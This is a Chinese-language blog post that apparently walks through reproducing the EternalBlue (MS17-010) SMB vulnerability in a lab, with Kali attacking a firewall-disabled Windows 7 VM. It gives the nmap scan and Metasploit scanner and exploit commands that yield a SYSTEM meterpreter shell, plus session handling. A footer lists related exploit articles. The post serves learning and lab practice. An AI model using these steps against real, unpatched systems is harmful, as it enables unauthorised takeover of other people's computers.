首页 > 其他分享 >永恒之蓝漏洞复现

永恒之蓝漏洞复现

时间:2024-06-22 19:57:28浏览次数:10  
标签:攻击 扫描 192.168 漏洞 复现 模块 永恒

永恒之蓝漏洞复现

漏洞背景:
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
存在漏洞的主机只需要开放445端口即可被攻击,获取系统最高权限。

环境准备:

  • 攻击端 Linux kali:192.168.214.128
  • 被攻击端 win 7 x64:192.168.214.129(关闭防火墙)

一、扫描端口

使用 nmap 扫描目标端口;

nmap 192.168.214.129

查看结果:445端口为开放状态,操作系统为 win 7;
image.png

二、扫描漏洞

调用 msf 工具选择永恒之蓝扫描模块,进行漏洞扫描

  1. 调用 msf 工具;
msfconsole

image.png

  1. 选择漏洞扫描模块;
# 搜索永恒之蓝相关模块(ms17_010)
search ms17_010
# 选择扫描模块
use 3

image.png

  1. 查看运行永恒之蓝攻击的必需参数;
show options

image.png

  1. RHOSTS为目标主机,必需项;
set rhosts 192.168.214.129

image.png

  1. 运行扫描
run

image.png

显示目标主机很可能会受到永恒之蓝漏洞的攻击。

三、漏洞攻击

  1. 选择漏洞攻击模块;
# 搜索永恒之蓝相关模块(ms17_010)
search ms17_010
# 选择攻击模块
use 0

image.png

  1. 查看参数;
show options

image.png

  1. 设置RHOSTS;
set rhosts 192.168.214.129

image.png

  1. 运行攻击;
run

image.png

攻击成功后返回一个 meterpreter 会话,通过该会话可以控制目标主机system权限。

  1. 输入 shell 即可进入win7的cmd;
# 进入命令行
shell
# 切换字符集编码,解决乱码问题
chcp 65001

image.png

  1. 查看主机信息;

image.png

四、放入后台

  1. 将会话放入后台,方便后续调用;
# 退出cmd
exit
# 将当前会话放入 msf 后台
background

image.png

  1. 查看会话并调用
# 查看所有已连接的会话
sessions
# 调用指定会话
sessions -i 1

image.png

标签:攻击,扫描,192.168,漏洞,复现,模块,永恒
From: https://blog.csdn.net/qq_45240382/article/details/139879442

相关文章

  • 网络安全 文件上传漏洞-13 第十三关 Pass-13
    点击第十三关,并点击选择显示源码。可以看到,题目要求我们上传一个图片马到服务器:functiongetReailFileType($filename){$file=fopen($filename,"rb");$bin=fread($file,2);//只读2字节fclose($file);$strInfo=@unpack("C2chars",$bin);......
  • JeecgBoot-queryFieldBySql-远程命令执行-RCE漏洞
    影响范围:3.0.0<=jeecg-boot<=3.5.32.4.x<=jeecg-boot<=2.4.6POC:POST/jeecg-boot/jmreport/queryFieldBySqlHTTP/1.1Host:ipPragma:no-cacheCache-Control:no-cacheSec-Ch-Ua:"GoogleChrome";v="125","Chromium&q......
  • 深度学习,强化学习,代码复现,文献复现,文章复现,科研复现,算法复现
    文章复现SCI代码复现文章代,文复现,具体包括:深度学习指导,计算机视觉辅导指导,目标检测图像分割,语义分割,算法性能提升,算法优化,模型修改,留学,人脸识别,文字识别口罩检测,人脸检测,车牌识别,GAN,yolo工业检测,异常检测,去噪,去模糊,异常检测,运动检测,VIT,点匹配,python指导,数据处理,医学影像分......
  • 栈帧浅析,堆栈漏洞概述——【太原理工大学软件安全期末补充】
    在上一篇文章中我说实验一不重要,确实没必要完全按照实验内容逐字逐句理解,但是这里我们补充一个知识点栈帧(StackFrame)是计算机程序执行过程中,调用栈(CallStack)中的一个单元,它包含了函数调用时的上下文信息。每当一个函数被调用时,一个新的栈帧就会被创建并被推入调用栈。栈帧......
  • Weaver E-Office v9.5 文件上传漏洞(CVE-2023-2648)
    前言CVE-2023-2648是一个在WeaverE-Office9.5版本中发现的严重漏洞。此漏洞位于文件/inc/jquery/uploadify/uploadify.php中,通过操控Filedata参数,可以进行不受限制的文件上传。这一漏洞允许攻击者上传可能包含危险类型的文件,并在应用程序环境中执行。该漏洞可以通过......
  • 文件包含漏洞-伪协议
    目录一、file://协议1.介绍2.利用条件3.利用方法二、http://协议1.介绍三、php://协议1.介绍2.php://input方法⑴前提条件 ⑵利用包3.php://filte方法⑴前提条件⑵格式四、案例(包含本地文件)1.包含敏感信息 2.包含图片 3.包含日志文件一、file://协议1......
  • 容器镜像安全:安全漏洞扫描神器Trivy
    目录一.系统环境二.前言三.Trivy简介四.Trivy漏洞扫描原理五.利用trivy检测容器镜像的安全性六.总结一.系统环境本文主要基于Dockerversion20.10.14和Linux操作系统Ubuntu18.04。服务器版本docker软件版本CPU架构Ubuntu18.04.5LTSDockerversion20.10.14x86_......
  • Zyxel NAS设备的CVE-2024-29973远程代码执行漏洞验证
    概述最近,ZyxelNAS设备曝出了一个重大安全漏洞(CVE-2024-29973),该漏洞允许远程攻击者在受影响的设备上执行任意代码。这一漏洞已经被广泛关注,并被证实可以在实际中复现。本文将详细介绍该漏洞的成因、利用方式以及如何检测和防御这种攻击。漏洞成因ZyxelNAS设备中存在一个不安......
  • 【漏洞挖掘】——101、搜索型注入深入刨析
    基本介绍网站为了用户便于搜索网站中的资源往往会加入搜索功能,如果底层的代码忽略了对搜索变量的过滤,则有可能会造成了搜索型注入漏洞(又称文本框注入),对于常见的搜索框而言,后台常用的SQL语句如下所示,在这里参数如果未经过滤直接拼接到SQL语句中则存在注入,注入方法类似于字符......
  • 【漏洞挖掘】——102、Blind注入类型深入刨析(上)
    基本介绍BlindInjection(即盲注),当SQL语句执行成功或失败不会给出明确的回显信息或者只有一个提示类的信息,类似于true\false时,此时可以考虑盲注,常见的盲注有以下几种:基于布尔的盲注基于时间的盲注布尔盲注适用场景适用于对于sql语句执行成功或失败各有一个提示结果,例......